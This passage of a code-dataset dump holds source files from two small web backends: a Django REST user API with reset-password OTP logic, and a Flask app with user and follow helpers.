})\n except Exception as e:\n return response_fail()\n \n\nclass LogoutUser(APIView):\n\n def get(self, request, *args, **kwargs):\n return response_success()\n\nclass UserResetPass(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\"]\n check_required_fields(required_fields, request.data)\n email = request.data.get(\"email\")\n try:\n user = User.objects.get(email=email)\n otp_code_reset_pass = ''.join(random.choices(string.digits, k = 4))\n user_otp = UserResetPassSerializer(data={\"uid\": str(user.uid),\"email\": email, \"otp_code_reset_pass\": otp_code_reset_pass})\n user_otp.is_valid(raise_exception=True)\n user_otp.save()\n #email_reset_pass.delay(email, otp_code_reset_pass)\n return response_success()\n except ObjectDoesNotExist as e:\n return Response({\n \"ResponseCode\": response_status.USER_NOT_EXISTED.code,\n \"ResponseMessage\": response_status.USER_NOT_EXISTED.message\n })\n except Exception as e:\n return response_fail()\n\n\nclass HelloView(APIView):\n permission_classes = [CheckAuthen]\n\n def get(self, request):\n return Response('Huraaaaa')\n" }, { "alpha_fraction": 0.6792828440666199, "alphanum_fraction": 0.6917330622673035, "avg_line_length": 36.185184478759766, "blob_id": "494351474f4fb5d5509a2d91978dab7bb0acb2f3", "content_id": "3d9597d929ecf936b52e5896ca819786ad59dc26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2008, "license_type": "no_license", "max_line_length": 99, "num_lines": 54, "path": "/api/models.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\nimport datetime\nimport uuid\n\nfrom django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass UserManager(BaseUserManager):\n \n def collect_list_users(self, check_point, limit, *args, **kwargs):\n return User.objects.filter(created_at__lte=check_point).order_by('-created_at')[:limit]\n\nclass User(AbstractBaseUser, PermissionsMixin):\n GENDER_CHOICES = (\n ('1', 'MALE'),\n ('2', 'FEMALE'),\n ('3', 'OTHERS'),\n )\n uid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n email = models.EmailField(unique=True, db_index=True, null=True, editable=False)\n fb_id = models.CharField(unique=True, max_length=255, db_index=True, null=True, editable=False)\n password = models.CharField(max_length=20, null=False)\n account_type = models.IntegerField(null=False, editable=False) #0: Email, 1: Face\n fullname = models.CharField(max_length=255, null=True)\n gender = models.BooleanField(choices=GENDER_CHOICES, max_length=1, null=True)\n birthday = models.DateField(null=True)\n avatar = models.CharField(max_length=255, null=True)\n is_banned = models.BooleanField(default=False, null=False)\n created_at = models.DateTimeField(default=timezone.now(), null=False)\n is_activated = models.BooleanField(default=False, null=False)\n\n objects = UserManager()\n \n def save(self, *args, **kwargs):\n self.account_type = 1 if(self.fb_id) else 0\n super().save(*args, **kwargs)\n\n\n USERNAME_FIELD = 'uid'\n\n class Meta:\n ordering = ['created_at']\n \n # def __str__(self):\n # return self.email\n\nclass UserOTP(models.Model):\n uid = models.CharField(primary_key=True, max_length=255, editable=False)\n email = models.EmailField(unique=True, null=False, blank=False)\n otp_code_reset_pass = models.CharField(max_length=10)\n\n objects = models.Manager()" }, { "alpha_fraction": 0.5944369435310364, "alphanum_fraction": 0.6191117167472839, "avg_line_length": 53.36585235595703, "blob_id": "b500eeffb7649fd264745a52aeb271aff27467d9", "content_id": "3e514d80ccbfba5feb0d108f58253473dec4dee5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2229, "license_type": "no_license", "max_line_length": 266, "num_lines": 41, "path": "/api/migrations/0001_initial.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-16 15:22\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('auth', '0011_update_proxy_permissions'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('uid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('email', models.EmailField(db_index=True, max_length=254, unique=True)),\n ('password', models.CharField(max_length=255)),\n ('account_type', models.CharField(default='Email', max_length=100)),\n ('fullname', models.CharField(max_length=255, null=True)),\n ('gender', models.BooleanField(choices=[(False, 'Nam'), (True, 'Nu')], null=True)),\n ('birthday', models.DateField(null=True)),\n ('avatar', models.CharField(max_length=255, null=True)),\n ('is_banned', models.BooleanField(default=False)),\n ('created_at', models.DateTimeField(default=datetime.datetime(2019, 10, 16, 15, 22, 46, 427699, tzinfo=utc))),\n ('is_activated', models.BooleanField(default=False)),\n ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),\n ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),\n ],\n options={\n 'ordering': ['created_at'],\n },\n ),\n ]\n" }, { "alpha_fraction": 0.5356125235557556, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 27.079999923706055, "blob_id": "1f090da87343ebf8ab7bf6015f93e1af00dd09fc", "content_id": "16e4f8ae8ce3c9fb9773cdd963d00c8bf5e8e868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 111, "num_lines": 25, "path": "/api/migrations/0017_auto_20191027_0918.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:18\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0016_auto_20191027_0900'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 18, 12, 265723, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.CharField(editable=False, max_length=255, primary_key=True, serialize=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6503401398658752, "alphanum_fraction": 0.6523809432983398, "avg_line_length": 37.71052551269531, "blob_id": "52e32849c30dc3455652b32ad0e2c74d137a1405", "content_id": "f45f44cdc6a2868ebfbc792a3237dd89ac4bfed4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 126, "num_lines": 38, "path": "/scmodels/serializers/user_serializers.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom api.models import User, UserOTP\n\nclass UserSerializer(serializers.ModelSerializer):\n password = serializers.CharField(min_length=3, max_length=16, required=True)\n email = serializers.EmailField(required=True)\n class Meta:\n model = User\n fields = ('email', 'password')\n\nclass GetUserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('uid', 'email', 'account_type', 'fullname', 'gender', 'birthday', 'is_banned', 'is_activated', 'created_at')\n\n # def to_representation(self, instance):\n # ret = super().to_representation(instance)\n # ret['uid'] = instance.uid.hex\n # return ret\n\nclass UpdateUserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('uid', 'fullname', 'gender', 'birthday')\n\nclass UserResetPassSerializer(serializers.ModelSerializer):\n uid = serializers.CharField(required=True)\n email = serializers.CharField(required=True)\n \n class Meta:\n model = UserOTP\n fields = ('uid', 'email', 'otp_code_reset_pass')\n \n def create(self, validated_data):\n user_otp = UserOTP.objects.update_or_create(email=validated_data.get('email', None),\n defaults={'otp_code_reset_pass': validated_data.get('otp_code_reset_pass', None),\n 'uid': validated_data.get('uid', None)})\n return user_otp" }, { "alpha_fraction": 0.6990049481391907, "alphanum_fraction": 0.6990049481391907, "avg_line_length": 27.785715103149414, "blob_id": "a21ef4cc80cf5325ad699c9bceb0ef690db0fa48", "content_id": "2faa79a0391f76d937f2694bafc695c77e8908c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 402, "license_type": "no_license", "max_line_length": 57, "num_lines": 14, "path": "/my_utils/response_utils.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework.response import Response\nfrom my_utils import response_status\n\ndef response_fail():\n return Response({\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': response_status.FAIL.message\n })\n\ndef response_success():\n return Response({\n 'ReponseCode': response_status.SUCCESS.code,\n 'ReponseMessage': response_status.SUCCESS.message\n })" }, { "alpha_fraction": 0.5328571200370789, "alphanum_fraction": 0.6100000143051147, "avg_line_length": 27, "blob_id": "6970788ac003d2aa823ff68003a8551403ffca57", "content_id": "5f278fed7405d54f25c7c1d620438cddc6c9daaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 700, "license_type": "no_license", "max_line_length": 112, "num_lines": 25, "path": "/api/migrations/0014_auto_20191026_1233.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 12:33\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0013_auto_20191026_1052'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 12, 33, 34, 865185, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.CharField(max_length=255, primary_key=True, serialize=False, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6897106170654297, "alphanum_fraction": 0.6961414813995361, "avg_line_length": 45.074073791503906, "blob_id": "c5a20652a8f42a2ebd885293f8ee011e242425f4", "content_id": "c967bd148896bc9258a2199adfd6ca2163c825ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 107, "num_lines": 27, "path": "/api/urls.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\"\"\"socialapi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import include, path\nfrom api.views import CreateUser, LoginUser, HelloView, LoginUserFace, LogoutUser, UpdateUser,UserResetPass\n\nurlpatterns = [\n path('user/', CreateUser.as_view(), name='createuser'),\n path('user/email/', LoginUser.as_view(), name='loginuser'),\n path('user/fb/', LoginUserFace.as_view(), name='loginuserface'),\n path('user/logout/', LogoutUser.as_view(), name='logout'),\n path('user/update/', UpdateUser.as_view(), name='update'),\n path('user/resetpass/', UserResetPass.as_view(), name='resetpass'),\n path('hello/', HelloView.as_view(), name='hello'),\n]\n" }, { "alpha_fraction": 0.7525597214698792, "alphanum_fraction": 0.755972683429718, "avg_line_length": 29.894737243652344, "blob_id": "194dd51be294504ff5db9590aac90c7a1e93dda0", "content_id": "583a49caced1ad822a9930e9c34df20a50eea81c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 69, "num_lines": 19, "path": "/socialapi/celery.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nimport os\n\nfrom celery import Celery\nfrom socialapi import settings\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'socialapi.settings')\n\napp = Celery('socialapi')\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Auto detect all task file in all Django installed app\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\[email protected](bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.6014925241470337, "avg_line_length": 25.799999237060547, "blob_id": "798bea4616e73c55ea8586186f908a9ddb8ed533", "content_id": "4ad1d132d5c383f0e1ce1623067bacd45796f43a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 670, "license_type": "no_license", "max_line_length": 110, "num_lines": 25, "path": "/api/migrations/0003_auto_20191018_0952.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-18 09:52\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0002_auto_20191017_1726'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='account_type',\n field=models.IntegerField(default=1, max_length=100),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 18, 9, 52, 57, 49039, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.5291750431060791, "alphanum_fraction": 0.6257545351982117, "avg_line_length": 23.850000381469727, "blob_id": "ccddab6d530b53c1d0aa3e20f4322a49a91da279", "content_id": "02a05104f0890446ab9bb9057d0b79dd279ba895", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 109, "num_lines": 20, "path": "/api/migrations/0016_auto_20191027_0900.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:00\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0015_auto_20191027_0841'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 0, 5, 843604, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.7582417726516724, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "738138981c787ddf8f266d428742cd6a3dbaae81", "content_id": "5ba0ab0904d5f7e7c5ba197c4b0b1998af203751", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/scmodels/apps.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass ScmodelsConfig(AppConfig):\n name = 'scmodels'\n" }, { "alpha_fraction": 0.7341772317886353, "alphanum_fraction": 0.7341772317886353, "avg_line_length": 16.55555534362793, "blob_id": "d66bc6bf3194e6f4e11c226451a1aab3ab16e23b", "content_id": "fa827a3035aa6a8560293872cd8bd95c0f491727", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 158, "license_type": "no_license", "max_line_length": 28, "num_lines": 9, "path": "/README.md", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# App Features\n- Register user via email\n- Register user via Facebook\n- Login user\n- Update user info\n- Reset pass.\n\n# Backend Tool Features\n- List all user.\n" }, { "alpha_fraction": 0.4610169529914856, "alphanum_fraction": 0.46305084228515625, "avg_line_length": 27.384614944458008, "blob_id": "e26e2849b753933b3672bb08c45d026e19f510b0", "content_id": "d42e6315ce5a64b4aace45b994849d5897552428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1475, "license_type": "no_license", "max_line_length": 103, "num_lines": 52, "path": "/my_utils/log_module.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import logging\nimport os\nfrom logging import config\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\ndef config_log(log_name, log_level):\n log_name = log_name\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"[%(asctime)s] %(levelname)s [%(name)s.%(funcName)s:%(lineno)d] %(message)s\",\n 'datefmt': \"%d/%b/%Y %H:%M:%S\"\n },\n },\n 'handlers': {\n 'console': {\n 'level': log_level,\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n },\n 'file': {\n 'level': log_level,\n 'formatter': 'standard',\n 'backupCount': 7,\n 'interval': 1,\n 'when': 'midnight',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': BASE_DIR + \"/logs/\" + log_name + \".log\"\n },\n },\n 'loggers': {\n log_name: {\n # 'handlers': ['console', 'file'],\n 'handlers': ['console'],\n 'level': log_level,\n },\n }\n }\n\n logging.config.dictConfig(LOGGING)\n\nif(str(os.getenv('ENV_SCRIPT')) == 'prod'):\n log_level = 'INFO'\nelse:\n log_level = 'DEBUG'\n\n\nconfig_log('socialapi', log_level)\nlogger_socialapi = logging.getLogger('socialapi')" }, { "alpha_fraction": 0.7123287916183472, "alphanum_fraction": 0.7123287916183472, "avg_line_length": 39.66666793823242, "blob_id": "e8c3c455430f5bc5a17f4a7f3e30e550b7b5699e", "content_id": "2c50a0b08d6ceefa8039d7e8f497fefe92dc9bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 75, "num_lines": 9, "path": "/my_utils/check_fields.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from my_utils import cus_exception\n\ndef check_required_fields(required_fields, request_data):\n for item in required_fields:\n if item not in request_data:\n raise cus_exception.ValidationFailed(f'Lack of {item} field')\n\n if(len(required_fields) != len(request_data)):\n raise cus_exception.ValidationFailed(f'You have unexpected fields')" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5756579041481018, "avg_line_length": 29.399999618530273, "blob_id": "6d6c1fd574bd132062a00b780b8615cfe2912087", "content_id": "435aad166cbb6b2bd621dbd45bf122cee86d500c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 912, "license_type": "no_license", "max_line_length": 122, "num_lines": 30, "path": "/api/migrations/0004_auto_20191024_0156.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-24 01:56\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0003_auto_20191018_0952'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 24, 1, 56, 35, 276112, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='fb_id',\n field=models.CharField(db_index=True, max_length=255, null=True, unique=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='gender',\n field=models.BooleanField(choices=[('1', 'MALE'), ('2', 'FEMALE'), ('3', 'OTHERS')], max_length=1, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.6446078419685364, "alphanum_fraction": 0.6519607901573181, "avg_line_length": 26.233333587646484, "blob_id": "196af15d7a79cc2845de73b91af7f6cacc79b662", "content_id": "93e6f8fc08b9bb41783c7de2e1d0eaee1fbc9232", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 816, "license_type": "no_license", "max_line_length": 61, "num_lines": 30, "path": "/my_utils/cus_exception.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from rest_framework.exceptions import APIException\nfrom rest_framework import status\nfrom my_utils import response_status\n\n\n\nclass ValidationFailed(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = ('Invalid input.')\n default_code = 'invalid'\n\n def __init__(self, message=None, detail=None, code=None):\n\n self.detail = {\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': message\n }\n\n\nclass TokenInvalid(APIException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = ('Invalid input.')\n default_code = 'invalid'\n\n def __init__(self, message=None, detail=None, code=None):\n\n self.detail = {\n 'ReponseCode': response_status.FAIL.code,\n 'ReponseMessage': \"Token invalid\"\n }" }, { "alpha_fraction": 0.5317185521125793, "alphanum_fraction": 0.5928488969802856, "avg_line_length": 27.899999618530273, "blob_id": "f8bf3cb33b2b7733b2f1ed515ba3f69af818277d", "content_id": "26d7e6f772d2ac00e99e0e21dcb9201859fb2f9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 111, "num_lines": 30, "path": "/api/migrations/0007_auto_20191025_0224.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-25 02:24\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0006_auto_20191024_0201'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='account_type',\n field=models.IntegerField(editable=False),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 25, 2, 24, 26, 588645, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='email',\n field=models.EmailField(db_index=True, editable=False, max_length=254, null=True, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5823096036911011, "alphanum_fraction": 0.6437346339225769, "avg_line_length": 29.148147583007812, "blob_id": "c99549a37c95b111e8c5f4892206f27456028122", "content_id": "c8111247c5c21b9a82e3c19f8ece7a0d4805d8f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/api/migrations/0018_auto_20191027_0936.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-27 09:36\n\nimport datetime\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0017_auto_20191027_0918'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 27, 9, 36, 21, 114555, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='userotp',\n name='uid',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL),\n ),\n ]\n" } ]
28
imgarth/motiky
https://github.com/imgarth/motiky
14847f88e29fcb89ff1030d60495af63a25c9cc2
59bf2a27454e65c3547f786e7770812e9ff803ab
d93d6d1e590d0baafa3c95b336f3aa5aa0ff3cc2
refs/heads/master
2021-01-20T22:55:10.690413
2013-06-26T14:51:59
2013-06-26T14:51:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7269043922424316, "alphanum_fraction": 0.7269043922424316, "avg_line_length": 29.09756088256836, "blob_id": "af107e8e6c0a0cf42fd3156070499fb8cdfbb94b", "content_id": "f1827a09f2d7d7029f35e7095ac3e7aab90b43fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 72, "num_lines": 41, "path": "/manage.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "import os\nimport sys\nfrom flask import current_app\nfrom flask.ext.script import Manager,prompt,prompt_pass,\\\n prompt_bool,prompt_choices\nfrom flask.ext.script import Server\nfrom werkzeug import generate_password_hash,check_password_hash\n\nfrom motiky import configs\nfrom motiky.configs import db\nfrom motiky import create_app\n\nfrom motiky.logic.models import CmsUser\n\napp = create_app(configs.ProductionConfig)\nmanager = Manager(app)\n\[email protected]\ndef create_all():\n if prompt_bool(\"Are you sure? You will init your database\"):\n db.create_all()\n\[email protected]\ndef drop_all():\n if prompt_bool(\"Are you sure? You will lose all your data!\"):\n db.drop_all()\n\[email protected]('-u','--username',dest='username',required=True)\[email protected]('-p','--password',dest='password',required=True)\[email protected]('-e','--email',dest='email',required=True)\ndef createuser(username=None,password=None,email=None):\n password = generate_password_hash(password)\n cmsuser = CmsUser(username=username,password=password,email=email)\n db.session.add(cmsuser)\n db.session.commit()\n print 'cms user was created'\n\nmanager.add_command('runserver',Server())\n\nif __name__ == '__main__':\n manager.run()\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6301369667053223, "avg_line_length": 13.199999809265137, "blob_id": "66af4cec3e8040ef2cd67892faf6dd6cb705d2cc", "content_id": "681b615d2377c00f71e57fe4713360ce6e666ffd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 73, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/deploy.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom fabric.api import env,run,cd\n\n\n" }, { "alpha_fraction": 0.6363480091094971, "alphanum_fraction": 0.6397867798805237, "avg_line_length": 30.410810470581055, "blob_id": "c834788ffe50a2e9b63458e485ac502a078aaf1e", "content_id": "89d4a0ebdcbc56da888eadbdd728f31b3f591f1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 109, "num_lines": 185, "path": "/motiky/logic/logic_user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,UserFollowAsso\n\nfrom motiky.configs import db\n\n@register('get_user')\ndef get_user(user_id):\n multi = False\n if type(user_id) == types.ListType:\n assert_error(all([type(u) == types.IntType for u in user_id]),'ParamError')\n multi = True\n else:\n assert_error(type(user_id) == types.IntType,'ParamError')\n user_id = user_id,\n\n users = User.query.filter(User.id.in_(user_id)).all()\n if not users:\n raise BackendError('EmptyError','用户不存在')\n\n if multi:\n return [u.json for u in users]\n else:\n return users[0].json\n\n@register('get_user_by_username')\ndef get_user_by_username(username):\n user = User.query.filter(User.username == username).first()\n return user.json if user else {}\n\n@register('get_user_by_email')\ndef get_user_by_email(email):\n user = User.query.filter(User.email == email).first()\n return user.json if user else {}\n\n@register('is_username_exist')\ndef is_username_exist(username):\n assert_error(type(username) == types.StringType,'ParamError')\n return True if _check_username(username) else False\n\n@register('is_email_exist')\ndef is_email_exist(email):\n assert_error(type(email) == types.StringType,'ParamError')\n return True if _check_email(email) else False\n\ndef _check_username(username):\n u = User.query.filter(db.func.lower(User.username) == username).first()\n return u\n\ndef _check_email(email):\n u = User.query.filter(User.email == email).first()\n return u\n\n\n@register('add_user')\ndef add_user(username,photo_url,uid,signature='',access_token=''):\n assert_error(type(username)==types.StringType,'ParamError','用户昵称应该为字符串')\n assert_error(photo_url == None or type(photo_url) == types.StringType,'ParamError')\n assert_error(type(uid) == types.StringType,'ParamError')\n\n qd = {\n 'username':username,\n 'photo_url':photo_url or '',\n 'uid':uid,\n 'signature':signature,\n 'access_token':access_token\n }\n\n try:\n user = User(**qd)\n db.session.add(user)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n\n return user.json\n\n@register('set_user')\ndef set_user(user_id,info_d):\n assert_error(type(user_id) == types.IntType,'ParamError')\n user = User.query.get(user_id)\n try:\n for k,v in info_d.items():\n if v is not None:\n setattr(user,k,v)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return user.json\n\n@register('get_user_by_uid')\ndef get_user_by_uid(uid):\n assert_error(type(uid) in (types.StringType,types.ListType),'ParamError')\n multi = False\n if type(uid) == types.ListType:\n multi = True\n else:\n uid = uid,\n\n users = User.query.filter(User.uid.in_(uid)).all()\n if len(users) == 0:\n raise BackendError('EmptyError','用户不存在')\n\n if multi:\n return [u.json for u in users]\n else:\n return users[0].json\n\n\n@register('follow_user')\ndef follow_user(fid,tid):\n assert_error(all([type(_id) == types.IntType for _id in [fid,tid]]),'ParamError')\n try:\n asso = UserFollowAsso(user_id=fid,user_id_to=tid)\n db.session.add(asso)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return asso.id\n\n@register('unfollow_user')\ndef unfollow_user(fid,tid):\n assert_error(all([type(_id) == types.IntType for _id in [fid,tid]]),'ParamError')\n asso = UserFollowAsso.query.filter(db.and_(UserFollowAsso.user_id==fid,UserFollowAsso.user_id_to==tid)).\\\n first()\n if asso is None:\n return\n try:\n db.session.delete(asso)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return True\n\n@register('is_following_user')\ndef is_following_user(uid,uid_to):\n if type(uid_to) == types.IntType:\n _count = db.session.query(UserFollowAsso.id).\\\n filter(db.and_(UserFollowAsso.user_id == uid,UserFollowAsso.user_id_to == uid_to)).count()\n return True if _count > 0 else False\n elif type(uid_to) == types.ListType:\n follow_uids = db.session.query(UserFollowAsso.user_id_to).\\\n filter(db.and_(UserFollowAsso.user_id == uid,UserFollowAsso.user_id_to.in_(uid_to))).all()\n follow_uids = [u[0] for u in follow_uids]\n ret_list = [(ret,ret in follow_uids) for ret in uid_to]\n return 